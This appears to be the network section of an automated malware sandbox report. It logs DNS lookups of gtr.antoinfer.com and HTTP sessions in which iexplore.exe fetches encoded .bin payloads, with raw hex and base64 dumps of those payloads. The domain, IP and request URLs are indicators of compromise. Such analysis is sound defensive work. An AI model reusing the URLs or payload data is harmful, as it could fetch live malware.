Jul 28, 2021 13:47:59.708056927 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.708089113 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.708137989 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.708152056 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.708187103 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.709351063 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.709460974 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:47:59.709553957 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.710102081 CEST	49746	80	192.168.2.4	185.228.233.17
Jul 28, 2021 13:47:59.789541960 CEST	80	49746	185.228.233.17	192.168.2.4
Jul 28, 2021 13:48:14.519860983 CEST	80	49740	185.228.233.17	192.168.2.4
Jul 28, 2021 13:48:14.519999027 CEST	49740	80	192.168.2.4	185.228.233.17

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 28, 2021 13:45:59.399903059 CEST	53097	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:45:59.425240993 CEST	53	53097	8.8.8.8	192.168.2.4
Jul 28, 2021 13:46:02.806834936 CEST	49257	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:46:02.828219891 CEST	53	49257	8.8.8.8	192.168.2.4
Jul 28, 2021 13:46:03.942423105 CEST	62389	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:46:03.968888044 CEST	53	62389	8.8.8.8	192.168.2.4
Jul 28, 2021 13:46:05.123039961 CEST	49910	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:46:05.146550894 CEST	53	49910	8.8.8.8	192.168.2.4
Jul 28, 2021 13:46:06.008549929 CEST	55854	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:46:06.030251026 CEST	53	55854	8.8.8.8	192.168.2.4
Jul 28, 2021 13:46:06.895272017 CEST	64549	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:46:06.915939093 CEST	53	64549	8.8.8.8	192.168.2.4
Jul 28, 2021 13:46:55.923141956 CEST	63153	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:46:55.950819016 CEST	53	63153	8.8.8.8	192.168.2.4
Jul 28, 2021 13:47:14.710267067 CEST	52991	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:47:14.731111050 CEST	53	52991	8.8.8.8	192.168.2.4
Jul 28, 2021 13:47:15.306786060 CEST	53700	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:47:15.329476118 CEST	53	53700	8.8.8.8	192.168.2.4
Jul 28, 2021 13:47:42.312607050 CEST	51726	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:47:42.339160919 CEST	53	51726	8.8.8.8	192.168.2.4
Jul 28, 2021 13:47:44.065171003 CEST	56794	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:47:44.342845917 CEST	53	56794	8.8.8.8	192.168.2.4
Jul 28, 2021 13:47:52.480674982 CEST	56534	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:47:52.502660036 CEST	53	56534	8.8.8.8	192.168.2.4
Jul 28, 2021 13:47:58.609726906 CEST	56627	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:47:58.637411118 CEST	53	56627	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:00.934286118 CEST	56621	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:00.962090015 CEST	53	56621	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:12.225994110 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:12.258085012 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:13.233498096 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:13.265110016 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:13.276761055 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:13.300801039 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:13.722744942 CEST	64801	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:13.807629108 CEST	53	64801	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:14.245825052 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:14.268208981 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:14.292480946 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:14.316703081 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:14.830348969 CEST	61721	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:14.903963089 CEST	53	61721	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:15.310137987 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:15.332660913 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:15.392132998 CEST	51255	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:15.487905025 CEST	53	51255	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:16.207978964 CEST	61522	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:16.231252909 CEST	53	61522	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:16.262177944 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:16.284215927 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:17.067504883 CEST	52337	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:17.091561079 CEST	53	52337	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:17.308420897 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:17.333807945 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:17.476437092 CEST	55046	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:17.500547886 CEST	53	55046	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:17.915119886 CEST	49612	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:17.992162943 CEST	53	49612	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:18.553750038 CEST	49285	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:18.574872971 CEST	53	49285	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:19.200534105 CEST	50601	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:19.221684933 CEST	53	50601	8.8.8.8	192.168.2.4
Jul 28, 2021 13:48:19.639708996 CEST	60875	53	192.168.2.4	8.8.8.8
Jul 28, 2021 13:48:19.660656929 CEST	53	60875	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 28, 2021 13:47:44.065171003 CEST	192.168.2.4	8.8.8.8	0xd71f	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)
Jul 28, 2021 13:47:58.609726906 CEST	192.168.2.4	8.8.8.8	0xf468	Standard query (0)	gtr.antoinfer.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 28, 2021 13:47:14.731111050 CEST	8.8.8.8	192.168.2.4	0x2077	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)
Jul 28, 2021 13:47:44.342845917 CEST	8.8.8.8	192.168.2.4	0xd71f	No error (0)	gtr.antoinfer.com		185.228.233.17	A (IP address)	IN (0x0001)
Jul 28, 2021 13:47:58.637411118 CEST	8.8.8.8	192.168.2.4	0xf468	No error (0)	gtr.antoinfer.com		185.228.233.17	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

gtr.antoinfer.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49741	185.228.233.17	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 28, 2021 13:47:44.437294960 CEST	1474	OUT	GET /02_2FRTV/EHY6_2ByVkK9zQWc7nVUHSO/fCtXqnqrPU/KM_2F1pf6mYZC4Gy7/bCWjowHLoe6i/IkZQTMTSLWC/A3a2f6f53ufRn9/E42sf0Trx1PwCM3URc2Wx/3meR8N06RbC7B5vz/fh1949JUpwcTC55/kxUMJM7FV5_2BW6yUI/Qi_2BBp7I/IolDvBZlj8BdCBHYqi7w/k9qRhAJwmrlYaX4Nld1/vuyMEecPRgPCKMIqpUl9z0/QU_2BZUyIrn6K/_2FFz5g9/uSWx1VCCRu0cJ4rt581fcIt/_2BF5K79Db/sITOyBjswJkOChsry/YZZI09hn/M HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 28, 2021 13:47:44.984083891 CEST	1476	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 28 Jul 2021 11:47:44 GMT Content-Type: application/octet-stream Content-Length: 258248 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: attachment; filename="610143e0e072b.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 62 59 6d 32 79 69 72 74 51 6a 31 39 52 39 42 54 49 7a 4a 76 55 32 6f 59 51 2b 58 4a 77 67 77 49 50 4a 6a 72 35 56 72 36 45 47 74 58 4a 72 79 62 38 4b 55 53 65 6d 77 45 6e 31 70 6e 76 39 70 7a 6d 56 34 44 66 2b 41 69 5a 55 30 42 49 45 30 31 67 75 6c 4e 30 61 5a 4d 36 4a 69 37 64 6e 7a 51 78 32 4a 5a 7a 65 33 37 61 4c 79 59 39 4f 78 74 75 44 6b 46 62 6c 55 52 44 63 42 75 7a 49 38 77 4f 62 79 64 53 6e 65 53 34 47 39 39 6e 5a 79 4b 33 4a 54 63 79 59 79 56 65 4d 48 64 6e 56 46 59 66 49 52 4b 45 57 4e 44 52 4f 45 68 48 75 2f 75 41 58 5a 78 2f 4d 72 61 35 57 73 52 6a 4f 70 34 2b 2f 37 55 52 30 70 37 42 33 61 39 4a 2f 76 78 55 74 64 41 42 4c 73 43 78 67 49 59 44 31 69 65 61 6a 71 6d 59 43 2b 2f 4d 34 72 32 4f 58 30 4d 54 53 48 7a 6e 2f 4c 6b 6d 39 73 33 2b 47 6c 53 30 49 76 61 68 74 38 4d 31 6c 51 44 38 79 64 4e 64 57 67 45 6d 32 71 70 48 57 64 6a 4c 65 73 72 70 34 6d 70 47 68 58 32 6e 7a 56 46 4f 61 65 73 50 46 73 73 75 33 44 4a 47 46 72 50 7a 5a 55 2f 42 35 79 34 41 30 62 75 67 57 57 77 71 32 31 46 59 31 4c 71 70 36 6a 36 78 64 30 7a 63 73 4a 4f 61 58 56 73 68 55 4a 4a 63 4d 4c 2f 35 71 59 77 53 2b 77 52 59 57 55 69 6f 39 4e 37 6b 32 59 70 66 4d 45 59 76 64 64 39 62 46 61 50 37 68 54 43 63 2b 2f 38 35 5a 32 6c 78 39 44 4b 30 34 6c 71 77 30 44 45 48 32 6a 36 41 45 70 46 51 6b 55 47 48 37 79 57 62 75 6b 73 74 37 6d 59 31 32 57 39 6f 67 48 5a 57 32 65 6b 61 71 7a 49 73 75 48 7a 4d 71 50 2b 6b 69 34 75 58 74 63 32 66 70 39 63 66 42 75 71 64 68 54 51 41 74 43 4f 69 74 48 74 69 48 56 67 30 7a 39 74 75 36 33 32 47 6e 55 66 6b 4f 6c 74 6c 2b 67 42 63 75 32 50 61 74 37 6f 67 4c 56 56 57 2b 71 7a 64 61 4f 5a 62 67 62 56 51 42 62 43 75 2b 50 6a 44 4c 53 2b 6f 44 39 61 31 58 32 33 74 42 59 6e 41 68 67 68 76 4a 6a 65 4f 46 38 32 4a 53 6a 4a 66 2b 31 51 39 5a 31 5a 4c 30 57 44 59 30 4b 73 33 35 45 34 53 4e 31 72 53 4f 42 73 44 46 70 4f 71 50 7a 69 68 76 33 73 66 63 52 48 51 4f 71 79 63 78 70 35 44 62 2b 50 71 61 6e 39 69 6d 49 2b 53 64 69 63 6f 70 56 6c 66 6e 59 52 75 5a 32 36 5a 4d 63 63 5a 2f 43 37 44 77 39 7a 41 76 36 74 54 71 7a 58 59 56 6c 71 6d 55 76 56 6f 61 30 4e 55 64 76 79 64 4f 56 44 67 37 63 54 32 33 66 4f 6c 50 4d 37 63 4c 30 6d 42 6d 4d 68 4b 77 33 55 30 6e 42 52 6a 6c 66 30 2b 77 6e 4a 5a 59 6b 50 2b 46 43 61 4c 48 53 31 35 4f 56 6c 67 63 34 4f 4d 34 4b 6c 2b 6e 65 2b 76 4e 46 57 51 79 4f 5a 50 53 39 76 58 6b 2b 73 37 5a 6a 66 46 45 73 35 4d 45 52 50 6f 75 74 70 58 33 39 73 42 54 45 2b 64 53 4b 36 58 74 35 69 74 77 62 62 79 58 72 6c 35 47 76 58 39 33 76 6a 42 74 41 72 31 62 32 73 47 67 50 4d 2f 71 5a 76 44 42 2b 38 66 74 38 6b 46 42 73 37 61 75 6f 61 5a 4d 69 75 61 2b 78 71 6b 71 73 38 67 65 66 44 39 2f 6a 48 2f 59 47 56 34 4f 76 4f 35 4f 63 63 62 6c 54 5a 42 36 78 39 31 49 52 74 4b 34 4b 50 49 75 75 Data Ascii: bYm2yirtQj19R9BTIzJvU2oYQ+XJwgwIPJjr5Vr6EGtXJryb8KUSemwEn1pnv9pzmV4Df+AiZU0BIE01gulN0aZM6Ji7dnzQx2JZze37aLyY9OxtuDkFblURDcBuzI8wObydSneS4G99nZyK3JTcyYyVeMHdnVFYfIRKEWNDROEhHu/uAXZx/Mra5WsRjOp4+/7UR0p7B3a9J/vxUtdABLsCxgIYD1ieajqmYC+/M4r2OX0MTSHzn/Lkm9s3+GlS0Ivaht8M1lQD8ydNdWgEm2qpHWdjLesrp4mpGhX2nzVFOaesPFssu3DJGFrPzZU/B5y4A0bugWWwq21FY1Lqp6j6xd0zcsJOaXVshUJJcML/5qYwS+wRYWUio9N7k2YpfMEYvdd9bFaP7hTCc+/85Z2lx9DK04lqw0DEH2j6AEpFQkUGH7yWbukst7mY12W9ogHZW2ekaqzIsuHzMqP+ki4uXtc2fp9cfBuqdhTQAtCOitHtiHVg0z9tu632GnUfkOltl+gBcu2Pat7ogLVVW+qzdaOZbgbVQBbCu+PjDLS+oD9a1X23tBYnAhghvJjeOF82JSjJf+1Q9Z1ZL0WDY0Ks35E4SN1rSOBsDFpOqPzihv3sfcRHQOqycxp5Db+Pqan9imI+SdicopVlfnYRuZ26ZMccZ/C7Dw9zAv6tTqzXYVlqmUvVoa0NUdvydOVDg7cT23fOlPM7cL0mBmMhKw3U0nBRjlf0+wnJZYkP+FCaLHS15OVlgc4OM4Kl+ne+vNFWQyOZPS9vXk+s7ZjfFEs5MERPoutpX39sBTE+dSK6Xt5itwbbyXrl5GvX93vjBtAr1b2sGgPM/qZvDB+8ft8kFBs7auoaZMiua+xqkqs8gefD9/jH/YGV4OvO5OccblTZB6x91IRtK4KPIuu
Jul 28, 2021 13:47:44.984112024 CEST	1477	IN	Data Raw: 50 78 6b 55 47 4a 4c 6e 68 46 36 57 74 78 48 61 50 35 34 52 35 55 70 63 48 68 58 31 62 78 54 2f 59 67 6b 2b 34 4d 47 6e 48 47 72 30 72 6f 6a 2f 64 39 63 50 58 4e 32 6f 53 45 53 4d 41 56 41 58 45 67 38 6f 72 35 77 50 59 57 71 57 74 44 33 46 33 74 Data Ascii: PxkUGJLnhF6WtxHaP54R5UpcHhX1bxT/Ygk+4MGnHGr0roj/d9cPXN2oSESMAVAXEg8or5wPYWqWtD3F3t8A0JaL1TjQzNbkwnBNULPQ2e5VaPiSMyCpr1BxX4y2z4KOFIXmTcE2fTwbP2VUCI10WE+56ZwcMSIEyf9wem05IiIlOWA2Ij369D2coVDRfdSdjp2e0dMd8nhjbgOg5QdL4KLrcMHeMZZ5+FOgv3TF5T9oUX7gOJp
Jul 28, 2021 13:47:44.984920979 CEST	1479	IN	Data Raw: 4b 64 63 36 32 6b 44 63 33 47 52 41 4f 33 37 6c 34 34 6c 42 30 74 48 48 2b 61 49 30 51 39 4d 72 2b 4c 61 76 38 68 54 77 49 6b 6b 43 6e 64 55 79 68 30 37 73 76 63 5a 42 51 79 2b 36 77 6a 49 36 61 74 68 62 38 33 4c 75 67 2b 37 64 4a 4b 59 68 56 41 Data Ascii: Kdc62kDc3GRAO37l44lB0tHH+aI0Q9Mr+Lav8hTwIkkCndUyh07svcZBQy+6wjI6athb83Lug+7dJKYhVASPQFUps7XectgPWCPJmAlSPORiH1LTY8020QkkGHePhXfo+8Vo++5xXIQx7/MhUJTUcscTmN5ah+wZWhGOWIulf3QHLG/sUQhibUZBgTf1A0RpVh6VU+dXhXYU1f6Bx3e5sH9RA0rhuaOqEyj4fUpgSqW+xLV6a+M
Jul 28, 2021 13:47:44.986373901 CEST	1480	IN	Data Raw: 71 71 2f 63 50 69 2b 6f 46 72 74 59 48 48 44 62 55 69 46 62 33 61 62 6c 7a 73 42 7a 34 36 70 62 64 74 75 6d 49 46 73 35 69 48 32 4f 6a 73 63 74 79 78 63 77 4d 58 64 5a 30 33 71 46 48 4a 62 73 75 36 66 4a 67 46 4c 74 2f 76 78 47 62 58 36 47 62 35 Data Ascii: qq/cPi+oFrtYHHDbUiFb3ablzsBz46pbdtumIFs5iH2OjsctyxcwMXdZ03qFHJbsu6fJgFLt/vxGbX6Gb5e8NRYMlOBIqAcu6Jb96/89ytvwjvpPgeAOcYwHFfnTEvCX+m26PzQ2jLFLnuGAyEXe2TrLxgpPUz8i+7PLWxsBI/NVxhz0DB0t7CNjp+3VtC0yRXAEHZ0MniOc9VwY1agIT6vb1W8+obdC6du61bFWvvI5m9Tf50B
Jul 28, 2021 13:47:44.987365961 CEST	1482	IN	Data Raw: 52 63 66 74 74 51 67 64 53 4c 58 6e 7a 70 74 57 35 6d 35 34 43 67 2f 45 69 4d 30 73 53 52 56 4c 72 32 46 55 58 2b 68 6a 69 54 5a 58 30 6f 71 63 49 6d 30 45 48 4b 43 71 56 75 51 2b 55 2b 50 54 50 68 4c 41 59 6f 45 5a 77 57 79 7a 6b 57 42 41 51 75 Data Ascii: RcfttQgdSLXnzptW5m54Cg/EiM0sSRVLr2FUX+hjiTZX0oqcIm0EHKCqVuQ+U+PTPhLAYoEZwWyzkWBAQuGXevwJthpmtWFMlecRiUuZS8cAvHGRYHdOzBsyLLsFt6LNaSc9i3LGumnVefKuILugtZ8eceM6ZRr8z47yAI9WYXBMu1PTMjjsEGXn2ET4x+6TOfEvB8dFWpPCO1aqF7bLZa5MXyV+58b4YYT6VRop20CStdDstCw
Jul 28, 2021 13:47:44.987401009 CEST	1483	IN	Data Raw: 36 63 66 37 48 31 7a 67 41 35 2b 79 76 32 75 63 49 71 6a 48 57 7a 6c 77 4d 31 62 34 35 58 77 62 4e 65 61 74 2b 75 49 56 47 78 52 78 62 6b 62 4d 62 70 51 4c 6a 34 49 72 72 59 6f 49 72 36 4e 36 35 35 32 34 32 6a 62 58 79 36 70 31 77 34 50 47 6b 6e Data Ascii: 6cf7H1zgA5+yv2ucIqjHWzlwM1b45XwbNeat+uIVGxRxbkbMbpQLj4IrrYoIr6N655242jbXy6p1w4PGknkMWSiaehadVOvqQkWKh6sltB06oaP6utYkuOZhxLfasmYEgrSu+FOMU/dkb4TWXBC9J0disgzDLeXHxck+h6wZSYDrzbhT+yt2O7XZSYySoNGwzwyX/HQXHxD7o1/yt3WoK9FdHyDzVGUq1Fwjg8HL9qanw/DBMZO
Jul 28, 2021 13:47:44.989960909 CEST	1484	IN	Data Raw: 32 6b 35 51 57 74 76 4e 39 5a 36 77 42 68 57 62 6e 58 74 37 76 69 37 70 70 66 4f 6a 74 6e 73 71 63 39 6c 2f 6e 58 79 43 48 55 51 79 75 30 61 31 66 69 43 46 43 32 49 63 58 2b 33 55 63 51 4d 5a 61 53 32 46 6f 43 62 4c 4e 67 38 56 32 6f 67 63 31 55 Data Ascii: 2k5QWtvN9Z6wBhWbnXt7vi7ppfOjtnsqc9l/nXyCHUQyu0a1fiCFC2IcX+3UcQMZaS2FoCbLNg8V2ogc1UhREMmQ0fRrydsBcYyA2K9oryeXV+6auH9qLpj9i524+EtEitYQa8iHMQzYExb/o55xW3aUwu0gT7CTJRb1wOIA/s6rwzYpCYcPkCccKcwX2PxWJ+6K6DXsO0JiERgzN1tcao3LnMIl6vMidBtoRmzgqpuHM+QhWOo
Jul 28, 2021 13:47:44.989990950 CEST	1486	IN	Data Raw: 72 4a 6e 59 6f 38 46 58 54 7a 61 56 2b 4e 55 48 63 31 50 46 54 67 33 67 49 38 71 42 58 4a 6b 49 47 51 2f 73 77 4c 64 54 45 63 45 78 36 52 78 4a 4f 66 55 62 55 77 5a 45 71 63 70 31 78 72 45 79 5a 44 4b 34 39 38 33 72 4d 35 76 52 53 50 61 36 33 50 Data Ascii: rJnYo8FXTzaV+NUHc1PFTg3gI8qBXJkIGQ/swLdTEcEx6RxJOfUbUwZEqcp1xrEyZDK4983rM5vRSPa63PKEccoGzbQtrzpBXs/BJaHqSoAHGNRytBnUIwmT6Ve8C9BFKCc62RsFCY0BHgNSebm5XyKj6+B3WRixFmkJF46pL4ISvyxUcprFfp4pAVQ9YSZkLrWc4bR3rFHKEbun0wz6lif4m5T+yl5F5oI/Rue4gnVTHftcqWs
Jul 28, 2021 13:47:44.992269993 CEST	1487	IN	Data Raw: 4f 43 46 69 2b 7a 71 38 74 2b 68 47 6a 41 4f 2b 63 51 47 73 4c 61 44 77 52 6e 72 56 6c 6c 62 45 69 78 50 75 79 42 31 42 52 4b 57 50 4e 64 33 53 2f 43 4c 53 6d 62 6e 62 2b 39 49 78 75 65 2b 75 43 66 77 6b 59 36 35 70 66 4d 72 4d 67 34 54 75 37 33 Data Ascii: OCFi+zq8t+hGjAO+cQGsLaDwRnrVllbEixPuyB1BRKWPNd3S/CLSmbnb+9Ixue+uCfwkY65pfMrMg4Tu73xhmh2WgeJdNAmXlWvI/Ix8dwYLp38EuD43PD7D6Q+IVyntv6vwNyj2P5C3tOau9oLr8i4qHMhNiwAX0KlDr/lErwWxDK6owugoWHNyK6Rvu7tmKsOid7kB/VZGRSfPJa85cAUFZV4a8DzwXfR9CTeTfD1BHZQxFFp
Jul 28, 2021 13:47:44.992300987 CEST	1489	IN	Data Raw: 52 43 74 58 5a 45 39 6b 49 42 58 76 51 6d 64 52 4b 78 2b 42 4b 33 53 7a 74 63 5a 59 48 64 46 6d 32 47 4b 66 47 79 63 54 34 6d 2b 71 48 55 35 66 41 48 34 36 78 68 33 58 4e 52 37 49 6a 4a 4f 54 78 67 79 72 58 63 76 45 6b 67 71 49 75 6c 68 5a 2f 73 Data Ascii: RCtXZE9kIBXvQmdRKx+BK3SztcZYHdFm2GKfGycT4m+qHU5fAH46xh3XNR7IjJOTxgyrXcvEkgqIulhZ/sGla9c4a8X15N9Q4OpPaTOmxfSmUL1RgtEqpmAeebPrFgPoHn1E3LzrA6EblHzUgYTPAtK6MjoeUBgZflKst3/W8QJ4lyOF+c0wG1QqPi9YjfhGrE9bg8vWrVkIZdNKy7OnHUjdkQ15Eu5pt6z2Dn8wtHsmWhdJaBz
Jul 28, 2021 13:47:45.064274073 CEST	1490	IN	Data Raw: 49 49 64 6b 66 75 49 79 38 34 45 4e 39 58 35 36 36 4e 59 2b 66 44 47 66 63 2b 53 30 43 4c 33 5a 31 32 30 33 51 75 63 61 48 61 32 63 4c 77 46 30 74 35 48 78 58 4f 44 57 77 57 67 51 62 54 53 31 46 31 7a 70 31 6b 69 58 75 43 31 53 52 42 70 47 46 53 Data Ascii: IIdkfuIy84EN9X566NY+fDGfc+S0CL3Z1203QucaHa2cLwF0t5HxXODWwWgQbTS1F1zp1kiXuC1SRBpGFSDDKuuKhCRtEMPHhMj6utRSh7P3IknjKn0Jctl8YdjVMMd5qetA0Pea9z3OGTdwVm+aAi59spF76jC3hBWCc927K7RiKKXlxBgf+3y3yx3IZZUroVfIMdIrR4Tswx5rk25jDDE9iQ5Bm839XUGluPZAneVwTZwYlCE

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49746	185.228.233.17	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Jul 28, 2021 13:47:58.751058102 CEST	1841	OUT	GET /mtJPbIZJhao/lLJRN3LZO2EvFc/VCw3UNiKyARh06G8CFACi/rvcu9DoT_2BWr3it/vuHuzB9pSHcZY8A/p5jj60CzJBYl9Lfa6y/ccpCtNQRI/kv6KUXrsc9szPvU9BS5d/INRHtQMx8ovuxsrRsSO/mBIUAu_2FXqDwSewtqhiF3/0y8M31aLbHe6S/83PL1bM6/ldvb9gwpgUV8X_2B2Qv6zJW/BQrwXyajxR/YXD2Kky6T0oSJ5G0A/e_2F9JsAj5ok/7mc5pqASMOR/DpTFFPntUkci7e/xU2mysx12dViVQ0ZXlm39/NDqJB6CJvjFI/z HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: gtr.antoinfer.com Connection: Keep-Alive
Jul 28, 2021 13:47:59.292139053 CEST	1842	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 28 Jul 2021 11:47:59 GMT Content-Type: application/octet-stream Content-Length: 258248 Connection: close Pragma: public Accept-Ranges: bytes Expires: 0 Cache-Control: must-revalidate, post-check=0, pre-check=0 Content-Disposition: attachment; filename="610143ef37a40.bin" Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Data Raw: 62 59 6d 32 79 69 72 74 51 6a 31 39 52 39 42 54 49 7a 4a 76 55 32 6f 59 51 2b 58 4a 77 67 77 49 50 4a 6a 72 35 56 72 36 45 47 74 58 4a 72 79 62 38 4b 55 53 65 6d 77 45 6e 31 70 6e 76 39 70 7a 6d 56 34 44 66 2b 41 69 5a 55 30 42 49 45 30 31 67 75 6c 4e 30 61 5a 4d 36 4a 69 37 64 6e 7a 51 78 32 4a 5a 7a 65 33 37 61 4c 79 59 39 4f 78 74 75 44 6b 46 62 6c 55 52 44 63 42 75 7a 49 38 77 4f 62 79 64 53 6e 65 53 34 47 39 39 6e 5a 79 4b 33 4a 54 63 79 59 79 56 65 4d 48 64 6e 56 46 59 66 49 52 4b 45 57 4e 44 52 4f 45 68 48 75 2f 75 41 58 5a 78 2f 4d 72 61 35 57 73 52 6a 4f 70 34 2b 2f 37 55 52 30 70 37 42 33 61 39 4a 2f 76 78 55 74 64 41 42 4c 73 43 78 67 49 59 44 31 69 65 61 6a 71 6d 59 43 2b 2f 4d 34 72 32 4f 58 30 4d 54 53 48 7a 6e 2f 4c 6b 6d 39 73 33 2b 47 6c 53 30 49 76 61 68 74 38 4d 31 6c 51 44 38 79 64 4e 64 57 67 45 6d 32 71 70 48 57 64 6a 4c 65 73 72 70 34 6d 70 47 68 58 32 6e 7a 56 46 4f 61 65 73 50 46 73 73 75 33 44 4a 47 46 72 50 7a 5a 55 2f 42 35 79 34 41 30 62 75 67 57 57 77 71 32 31 46 59 31 4c 71 70 36 6a 36 78 64 30 7a 63 73 4a 4f 61 58 56 73 68 55 4a 4a 63 4d 4c 2f 35 71 59 77 53 2b 77 52 59 57 55 69 6f 39 4e 37 6b 32 59 70 66 4d 45 59 76 64 64 39 62 46 61 50 37 68 54 43 63 2b 2f 38 35 5a 32 6c 78 39 44 4b 30 34 6c 71 77 30 44 45 48 32 6a 36 41 45 70 46 51 6b 55 47 48 37 79 57 62 75 6b 73 74 37 6d 59 31 32 57 39 6f 67 48 5a 57 32 65 6b 61 71 7a 49 73 75 48 7a 4d 71 50 2b 6b 69 34 75 58 74 63 32 66 70 39 63 66 42 75 71 64 68 54 51 41 74 43 4f 69 74 48 74 69 48 56 67 30 7a 39 74 75 36 33 32 47 6e 55 66 6b 4f 6c 74 6c 2b 67 42 63 75 32 50 61 74 37 6f 67 4c 56 56 57 2b 71 7a 64 61 4f 5a 62 67 62 56 51 42 62 43 75 2b 50 6a 44 4c 53 2b 6f 44 39 61 31 58 32 33 74 42 59 6e 41 68 67 68 76 4a 6a 65 4f 46 38 32 4a 53 6a 4a 66 2b 31 51 39 5a 31 5a 4c 30 57 44 59 30 4b 73 33 35 45 34 53 4e 31 72 53 4f 42 73 44 46 70 4f 71 50 7a 69 68 76 33 73 66 63 52 48 51 4f 71 79 63 78 70 35 44 62 2b 50 71 61 6e 39 69 6d 49 2b 53 64 69 63 6f 70 56 6c 66 6e 59 52 75 5a 32 36 5a 4d 63 63 5a 2f 43 37 44 77 39 7a 41 76 36 74 54 71 7a 58 59 56 6c 71 6d 55 76 56 6f 61 30 4e 55 64 76 79 64 4f 56 44 67 37 63 54 32 33 66 4f 6c 50 4d 37 63 4c 30 6d 42 6d 4d 68 4b 77 33 55 30 6e 42 52 6a 6c 66 30 2b 77 6e 4a 5a 59 6b 50 2b 46 43 61 4c 48 53 31 35 4f 56 6c 67 63 34 4f 4d 34 4b 6c 2b 6e 65 2b 76 4e 46 57 51 79 4f 5a 50 53 39 76 58 6b 2b 73 37 5a 6a 66 46 45 73 35 4d 45 52 50 6f 75 74 